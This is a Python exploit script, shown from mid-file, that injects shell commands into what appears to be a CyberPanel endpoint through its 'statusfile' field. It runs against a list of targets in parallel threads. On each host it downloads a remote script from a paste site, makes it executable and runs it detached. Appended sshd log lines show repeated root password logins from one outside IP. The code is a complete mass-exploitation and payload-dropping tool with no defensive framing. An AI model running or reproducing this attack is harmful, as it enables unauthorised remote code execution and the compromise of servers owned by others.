
	headers = {
	"X-CSRFToken": CSRF_token,
	"Content-Type": "application/json",
	"Referer": str(client.base_url)
	}

	payload = '{"statusfile":"/dev/null; %s; #","csrftoken":"%s"}' % (cmd, CSRF_token)
	try:
	response = client.put("/dataBases/upgrademysqlstatus", headers=headers, data=payload)
	if response.headers.get("Content-Type", "").startswith("application/json"):
	return response.json().get("requestStatus", "No response")
	else:
	print(f"Unexpected response type from {client.base_url}: {response.text}")
	return "Unexpected response"
	except httpx.RequestError:
	return "Failed to execute"

	def execute_command(client, command):
	CSRF_token = get_CSRF_token(client)
	if not CSRF_token:
	print(f"Could not retrieve CSRF token from {client.base_url}")
	return "Failed to retrieve CSRF token"

	print(f"Executing: {command} on {client.base_url}")
	stdout = pwn(client, CSRF_token, command)
	print(stdout)
	return stdout

	def process_target(target):
	print(f"Processing target: {target}")
	try:
	client = httpx.Client(base_url=target, verify=False, timeout=5.0)

	# Step 1: Download the file
	if "Failed" in execute_command(client, "curl -L https://www.paste.tc/raw/asd-41506 -o /var/actually.sh"):
	return

	# Step 2: Check if the file exists, retry if necessary
	file_exists = False
	while not file_exists:
	response = execute_command(client, "ls /var/actually.sh")
	if "No such file or directory" not in response:
	file_exists = True
	print("File found. Proceeding with further steps...")
	else:
	print("File not found. Waiting for the download to complete...")
	time.sleep(2) # Wait for 2 seconds before checking again

	# Step 3: Change permissions for the downloaded file
	execute_command(client, "chmod +x /var/actually.sh")

	# Step 4: Remove any carriage return issues
	execute_command(client, "sed -i 's/\r//g' /var/actually.sh")

	# Step 5: Execute the script with nohup to detach and log to /dev/null
	execute_command(client, "nohup /var/actually.sh")

	print("Script executed and detached.")
	except httpx.RequestError as e:
	print(f"Could not connect to {target}. Error: {str(e)}")

	def main(targets_file, max_threads=5):
	try:
	with open(targets_file, "r") as file:
	targets = [line.strip() for line in file if line.strip()]

	with ThreadPoolExecutor(max_threads) as executor:
	future_to_target = {executor.submit(process_target, target): target for target in targets}

	for future in as_completed(future_to_target):
	target = future_to_target[future]
	try:
	future.result()
	except Exception as exc:
	print(f"{target} generated an exception: {exc}")

	except FileNotFoundError:
	print(f"Error: File {targets_file} not found.")
	sys.exit(1)

	if __name__ == "__main__":
	if len(sys.argv) < 2:
	print("Usage: python3 ak48.py targets.txt [max_threads]")
	sys.exit(1)

	targets_file = sys.argv[1]
	max_threads = int(sys.argv[2]) if len(sys.argv) > 2 else 5

	main(targets_file, max_threads)
	Oct 29 12:01:15 ready sshd[2293619]: Accepted password for root from 188.119.27.24 port 31771 ssh2
	Oct 29 12:35:48 ready sshd[2294265]: Accepted password for root from 188.119.27.24 port 30923 ssh2
	Oct 29 13:25:23 ready sshd[2294914]: Accepted password for root from 188.119.27.24 port 31508 ssh2
	Oct 29 14:04:22 ready sshd[2295536]: Accepted password for root from 188.119.27.24 port 31502 ssh2
	Oct 29 14:15:47 ready sshd[2296023]: Accepted password for root from 188.119.27.24 port 31334 ssh2